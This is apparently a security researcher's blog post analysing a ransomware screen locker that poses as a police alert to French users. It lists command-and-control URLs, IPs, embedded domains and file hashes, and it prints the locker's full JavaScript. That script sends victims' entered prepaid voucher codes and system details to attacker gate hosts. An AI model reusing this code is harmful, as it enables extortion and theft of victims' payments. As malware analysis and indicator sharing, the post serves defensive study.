Sunday 11 December 2011

FakePoliceAlert winlock targeting French people

Thanks to Malekal_morte for the samples and to the Secubox Labs (nice teamwork guys)

The first version of the winlock was very ugly and with alot of spelling errors:

Network activity:
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN

--

Second version:


As usual, no unlock code.

Network activity:
http://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1

Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM





Some cyrillic text was found on the CSS:

Template:
/*
* Global variables
*/


var debug = false;
var debug_ec = false;

if (debug || debug_ec)
{
    alert("DEBUG! DEBUG! DEBUG!");
    document.getElementById("v3").value = "1";
}

var penalty_amount = 200;
var g_botnet = "fr1";
var g_os_version = "Unknown";
var g_userid = "0";

var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

if (debug)
{
    g_gates = [
        "http://lck-test.net/gate.php",
        "http://lck-test4.net/gate.php", // not exists
        "http://lck-test1.net/gate.php",
        "http://lck-test2.net/gate.php",
        "http://lck-test3.net/gate.php"
        ]
}

else
{
    g_gates = [
        "http://bundespol.com/gate.php",
        "http://yycqparxvohd.com/gate.php",
        "http://wzuoqliyknpz.com/gate.php"
        ]
}

var positions_count = 1;
var g_state = new Object();
g_state.geo_location_lock = false;
g_state.geo_location_set = false;
g_state.report_lock = false;
g_state.report = "";
g_state.report_sent = true;
g_state.gate_selector_lock = false;
g_state.gate_selector_gate_works = true;
g_state.gate_selector_calls_count = 999999;
g_state.gate_selector_gate_index = 0;
g_state.os_version_set = false;
g_state.userid_set = false;

g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";


function print_g_state()
{
    if (debug_ec)
    {
        console.log("dump of g_state:")
        console.log("\tg_state.geo_location_lock: %s", g_state.geo_location_lock ? "true" : "false");
        console.log("\tg_state.geo_location_set: %s", g_state.geo_location_set ? "true" : "false");
        console.log("\tg_state.report_lock: %s", g_state.report_lock ? "true" : "false");
        console.log("\tg_state.report: %s", g_state.report);
        console.log("\tg_state.report_sent: %s", g_state.report_sent ? "true" : "false");
        console.log("\tg_state.gate_selector_lock: %s", g_state.gate_selector_lock ? "true" : "false");
        console.log("\tg_state.gate_selector_gate_works: %s", g_state.gate_selector_gate_works ? "true" : "false");
        console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
        console.log("\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]);
        console.log("===================================================================================================");
    }
}

function base64_encode(input, key)
{
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    while (i < input.length)
    {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);
        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2))
        {
            enc3 = enc4 = 64;
        }
        else if (isNaN(chr3))
        {
            enc4 = 64;
        }
        output = output +
            key.charAt(enc1) + key.charAt(enc2) +
            key.charAt(enc3) + key.charAt(enc4);
    }
    return output;
}

/*
 * multitab window's tabs switcher
*/


function switch_tab(content_tab_id, content_id)
{
    document.getElementById('vouchers_info_tab').className = 'close';
    document.getElementById('penalty_form_tab').className = 'close';
    document.getElementById(content_tab_id).className = 'open';
    document.getElementById('vouchers_info').style.display = 'none';
    document.getElementById('penalty_form').style.display = 'none';
    document.getElementById(content_id).style.display = 'block';
    return;
}

/*
* Text input filter
*/


(function()
{   // after loading document init function will be called
    if (window.addEventListener)
        window.addEventListener("load", init, false);
    else if (window.attachEvent)
        window.attachEvent("onload", init);

})();

function register_handler(id)
{
    // register handler function
    if (id.addEventListener)
    {
        id.addEventListener("keypress", filter, false);
    }
    else
    {
        id.onkeypress = filter;
    }

    return;
}

// Find all <input> tags, for which necessary to register event handler
function init()
{
    var inputtags = document.getElementsByTagName("input");
    for(var i = 0; i < inputtags.length; i++) // traverse all tags
    {
        var tag = inputtags[i];
        if (tag.type != "text") continue; // only text fields
        var allowed = tag.getAttribute("allowed");
        if (!allowed) continue; // and only if presents attribute 'allowed'
        // register handler function
        register_handler(tag);
    }
}

// This is event 'keypress' handler, which maintains input filtration.
function filter(event)
{
    // Get event object and character code by portable way
    var e = event || window.event; // Keyboard event object
    var code = e.charCode || e.keyCode; // What key pressed

    // If pressed functional key do not filter it
    if (e.charCode == 0) return true; // Functional key (FF only)
    if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
    if (code < 32) return true; // ctrl ASCII code

    // Now get information from input element
    var allowed = this.getAttribute("allowed"); // Allowed characters
    var errorClassName = this.getAttribute("errorclass"); // class name indicating error
    var successClassName = this.getAttribute("successclass"); // class name indicating success

    // Translate key code to character
    var c = String.fromCharCode(code);

    // Check whether character in allowed characters list or not
    if (allowed.indexOf(c) != -1)
    {
        // character c is allowed
        this.className = successClassName;
        return true; // Accept input
    }
    else
    {
        // character c is not allowed
        this.className = errorClassName;
        // Prevent input
        if (e.preventDefault) e.preventDefault();
        if (e.returnValue) e.returnValue = false;
        return false;
    }
}

/*
* End of text input filter
*/



/*
* penalty form support code

*/

function get_position_number_html(position_number)
{
    return "" + (position_number * 1 + 1);
}

function get_voucher_code_html(position_number)
{
    return "<input id='voucher_code" + position_number + "' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>";
}

function get_voucher_value_html(position_number)
{
    return "<input id='voucher_value" + position_number + "' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>";
}

function get_img_minus_html(position_number)
{
    return position_number <= 0 ? "" : "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
}

function add_voucher_position()
{
    var position_number = positions_count;
    positions_count++;

    var newrow = document.all.penalty.insertRow(position_number + 1);
    var newcell = newrow.insertCell(0);
    newcell.innerHTML = get_position_number_html(position_number);
    newcell = newrow.insertCell(1);
    newcell.innerHTML = get_voucher_code_html(position_number);
    newcell = newrow.insertCell(2);
    newcell.innerHTML = get_voucher_value_html(position_number);
    newcell = newrow.insertCell(3);
    newcell.innerHTML = get_img_minus_html(position_number);

    register_handler(document.getElementById("voucher_code"+position_number));
    register_handler(document.getElementById("voucher_value"+position_number));
    return;
}

function delete_voucher_position(position_number)
{
    var i, j;
    var vouchers = new Array();
    var values = new Array();
    var total_amount;

    for(i = 0, j = 0; i < positions_count; i++)
    {
        if (i != position_number)
        {
            vouchers[j] = document.getElementById("voucher_code"+i).value;
            values[j] = document.getElementById("voucher_value"+i).value;
            j++;
        }
    }

    for(i = 0; i < positions_count; i++)
    {
        document.all.penalty.deleteRow(1);
    }

    positions_count--;

    for(i = 0; i < positions_count; i++)
    {
        var newrow = document.all.penalty.insertRow(i + 1);
        var newcell = newrow.insertCell(0);
        newcell.innerHTML = get_position_number_html(i);
        newcell = newrow.insertCell(1);
        newcell.innerHTML = get_voucher_code_html(i);
        newcell = newrow.insertCell(2);
        newcell.innerHTML = get_voucher_value_html(i);
        newcell = newrow.insertCell(3);
        newcell.innerHTML = get_img_minus_html(i);
    }

    for(i = 0; i < positions_count; i++)
    {
        document.getElementById("voucher_code"+i).value = vouchers[i];
        document.getElementById("voucher_value"+i).value = values[i];
        register_handler(document.getElementById("voucher_code"+i));
        register_handler(document.getElementById("voucher_value"+i));
    }

    total_amount = 0;
    for(i = 0; i < positions_count; i++)
    {
        total_amount += values[i] * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    return;
}

function refresh_total()
{
    var total_amount = 0;
    for(var i = 0; i < positions_count; i++)
    {
        total_amount += document.getElementById("voucher_value"+i).value * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;
    var do_pay = document.getElementById("do_pay");
    //do_pay.disabled = total_amount < penalty_amount ? 'disabled' : '';
    do_pay.disabled = '';

    return total_amount;
}

/*
* End of penalty form support code
*/


/*
* Geoip code
*/

function http_new_request()
{
    if(typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    else if(window.ActiveXObject)
    {
        var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
        for (var i = 0; i < aVersions.length; i++)
        {
            try
            {
                return new ActiveXObject(aVersions[i]);
            }
            catch (e) {}
        }
    }
}

function http_get(target, callback, options)
{
    var request = http_new_request();
    var timer;

    if (options.timeout)
    {
        timer = setTimeout(
            function()
            {
                request.abort();
                if (options.timeoutHandler)
                    options.timeoutHandler(target);
            },
            options.timeout
            )
    }

    request.onreadystatechange = function()
    {
        if (request.readyState == 4)
        {
            if (timer) clearTimeout(timer);
            if (request.status == 200)
            {
                callback(request.responseText);
            }
            else
            {
                if (options.errorHandler) options.errorHandler(request.status, request.statusText);
                else callback(null);
            }
        }
    }

    try
    {
        request.open("GET", target, true);
        request.send(null);
    }

    catch (e) {
    }
}

function set_geo_location()
{
    var options = new Object();
    function cb_set_geo_location(response_text)
    {
        try
        {
            if (response_text == null)
            {
                g_state.geo_location_set = false;
            }
            else
            {
                var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
                var s_ip = response_text.match(re)[2].toString();
                re = /ISP:(.*?)<b>(.*?)<\/b>/i;
                var s_isp = response_text.match(re)[2].toString();
                re = /City:(.*?)<b>(.*)<\/b>/i;
                var s_city = response_text.match(re)[2].toString();
                if (s_ip == "")
                {
                    s_ip = "188.28.11.121";
                }
                document.getElementById("v_ip").innerHTML = s_ip;
                document.getElementById("v_city").innerHTML = s_city;
                document.getElementById("v_isp").innerHTML = s_isp;
                g_state.geo_location_set = true;
            }
        }

        catch (e) {}
        finally
        {
            g_state.geo_location_lock = false;
        }
    }
    function cb_set_geo_location_timeout(target)
    {
        g_state.geo_location_set = false;
        g_state.geo_location_lock = false;
    }

    if (!g_state.geo_location_set && !g_state.geo_location_lock)
    {
        g_state.geo_location_lock = true;
        options.timeout = 3000;
        options.timeoutHandler = cb_set_geo_location_timeout;
        http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
    }
}

function select_gate()
{
    var options = new Object();
    function cb_select_gate(response_text)
    {
        if (response_text == RESPONSE_PONG)
        {
            g_state.gate_selector_gate_works = true;
            g_state.gate_selector_calls_count = 0;
            if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            g_state.gate_selector_gate_works = false;
            if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.gate_selector_lock = false;
    }
    function cb_select_gate_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.gate_selector_lock = false;
        if (debug_ec) console.log("Pinging gate %s was timeout.");
    }

    if (!g_state.gate_selector_lock && g_state.userid_set)
    {
        if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
        {
            g_state.gate_selector_lock = true;
            if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);
            if (!g_state.gate_selector_gate_works)
            {
                g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
            }
            options.timeout = 5000;
            options.timeoutHandler = cb_select_gate_timeout;
            var os_version = base64_encode(g_os_version, g_base64_std_key);
            http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
        }
    }
}

function send_report()
{
    var options = new Object();

    function cb_send_report(response_text)
    {
        if (response_text != RESPONSE_OK)
        {
            g_state.gate_selector_gate_works = false;
            g_state.report_sent = false;
            if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);

        }
        else
        {
            if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.report_lock = false;
    }

    function cb_send_report_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.report_lock = false;
        if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
    }

    if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
    {
        g_state.report_lock = true;
        if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        // set 'report_sent = true' here to prevent overwriting this flag in
        // moment between changing report value and calling cb_send_report()
        g_state.report_sent = true;
        options.timeout = 5000;
        options.timeoutHandler = cb_send_report_timeout;
        http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
    }
}

function set_os_version()
{
    if (g_state.os_version_set) return;

    var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
    var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
    var os = "";

    for (var i = 0; i < iOS.length; i++)
    {
        if (navigator.userAgent.indexOf(iOS[i]) > -1)
        {
            os = oOS[i];
            break;
        }
    }

    g_os_version = os;
    document.getElementById("v_os").innerHTML = os;
    g_state.os_version_set = true;
    if (debug_ec) console.log("OS version set successfully.");
}

function set_userid()
{
    if (g_state.userid_set) return;

    g_userid = document.getElementById("v3").value;
    if (g_userid != "0")
    {
        g_state.userid_set = true;
        if (debug_ec) console.log("Userid set successfully.");
    }
}

function monitor()
{
    refresh_total();
    set_geo_location();
    set_os_version();
    set_userid();
    select_gate();
    send_report();
}

window.onload = function ()
{
    setInterval(monitor, 1000);
}

function are_vouchers_valid()
{
    var prefix;
    var is_valid = true;
    var ret = true;

    for(var i = 0; i < positions_count; i++)
    {
        var voucher_code = document.getElementById("voucher_code"+i);
        var voucher = voucher_code.value;
        if (voucher.length == 19)
        {
            prefix = voucher.substr(0, 6);
            if (prefix != "633718")
            {
                is_valid = false;
            }
        }
        else if (voucher.length == 16)
        {
            prefix = voucher.substr(0, 1);
            if (prefix != "0")
            {
                is_valid = false;
            }
        }
        else
        {
            is_valid = false;
        }

        if (is_valid)
        {
            voucher_code.className = voucher_code.getAttribute("successclass");
        }
        else
        {
            voucher_code.className = voucher_code.getAttribute("errorclass");
            ret = false;
        }
    }

    return ret;
}

function send_vouchers()
{
    var report = "";

    if (!are_vouchers_valid())
    {
        alert(MSG_WRONG_VOUCHERS);
        return;
    }

    var total = refresh_total();
    if (total < penalty_amount)
    {
        alert(MSG_LOW_TOTAL);
        return;
    }

    for(var i = 0; i < positions_count; i++)
    {
        var voucher = document.getElementById("voucher_code"+i).value;
        var value = document.getElementById("voucher_value"+i).value;
        report += report.length ? "x" : "";
        report += voucher + "-" + value;
    }

    if (report.length > 16)
    {
        report = base64_encode(report, g_base64_priv_key);
        if (g_state.report != report)
        {
            g_state.report = report;
            g_state.report_sent = false;
            if (debug_ec) console.log("Report updated and wait sending.");
        }
    }

    alert(MSG_VOUCHERS_SENT);
    return;
}

MD5: 6911BAA817B5066B7566FC4D3CB1A207
MD5: B2B12C18DD26E30D69B64518EA074637

3 comments:

  1. is there any way to get the unlock code of these kind of malwares? if not then how does the malware author achieves that.
    please explain...

    ReplyDelete
  2. there is no unlock code for BKA malware, even if you pay you will never receive an unlock code. and the malware aithor can't unlock your pc.

    ReplyDelete
  3. i write a code to unlock avi files. You can find it there: http://past.hackbbs.org/index.php?id=20120418000000_64463

    ReplyDelete